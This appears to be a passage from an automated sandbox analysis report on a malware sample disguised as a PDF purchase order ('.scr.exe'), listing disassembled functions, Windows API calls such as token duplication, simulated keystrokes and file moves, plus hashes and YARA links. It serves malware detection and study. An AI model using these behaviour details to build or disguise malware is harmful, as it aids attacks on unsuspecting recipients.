                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 197181222-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                                                                                                                                                                                                            Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                                                                                                                                                                                                            Function 0553D2CC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 0553D2E1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5b7e7d7e4c7da00a95e38e27d30d1fe007edee0730b522200194dca1a1f71927
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3E09A7494010EAFDB00EFA4D5496AE7BB4EF04301F1005A1FD0596680DA309A549A62
                                                                                                                                                                                                                                                                                                            Function 0553D2D0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 0553D2E1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                            • Instruction ID: d909e20643b7253168a4f9a2059a3f6510664527b8dbcd069a89da7e95141c0d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15E0BF7494010EAFDB00EFA4D5496AE7BB4EF04301F100561FD0592280DA3099509A62

                                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                                            Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$State$LongProcWindow
                                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                                                                            • API String ID: 1562745308-4164748364
                                                                                                                                                                                                                                                                                                            • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                                                                                                                                                            • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                                                                                                                                                                                                            Function 004045E0 Relevance: 46.9, Strings: 35, Instructions: 3193COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                                                                                                                                                                                                            • API String ID: 0-3772701627
                                                                                                                                                                                                                                                                                                            • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                                                                                                                                                                                            • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                                                                                                                                                                                                            Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 004375E1
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                            • API String ID: 3778422247-2988720461
                                                                                                                                                                                                                                                                                                            • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                                                                                                                                                                                                            Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0044621B
                                                                                                                                                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                                                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                                                                                                                                                                                                            • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                                                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044639E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                                                                                                                                                                                                            • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                                                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                                                                                                                                                                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                                                                                                                                                                                                            • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                                                                                                                                                                                                            • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                                                                                                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                                            • API String ID: 2173856841-1027155976
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2af4fb292b3820614907b6fef5829bf2aa745f8d525175a90eec80f6cf43f0ef
                                                                                                                                                                                                                                                                                                            • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2af4fb292b3820614907b6fef5829bf2aa745f8d525175a90eec80f6cf43f0ef
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                                                                                                                                                                                                            Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,004A8E80,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BD96
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BDBF
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0044BE73
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BE85
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BE97
                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                            • API String ID: 2188072990-1173974218
                                                                                                                                                                                                                                                                                                            • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                                                                                                                                                                                            • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                                                                                                                                                                                                                            Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00434D91
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00434D9B
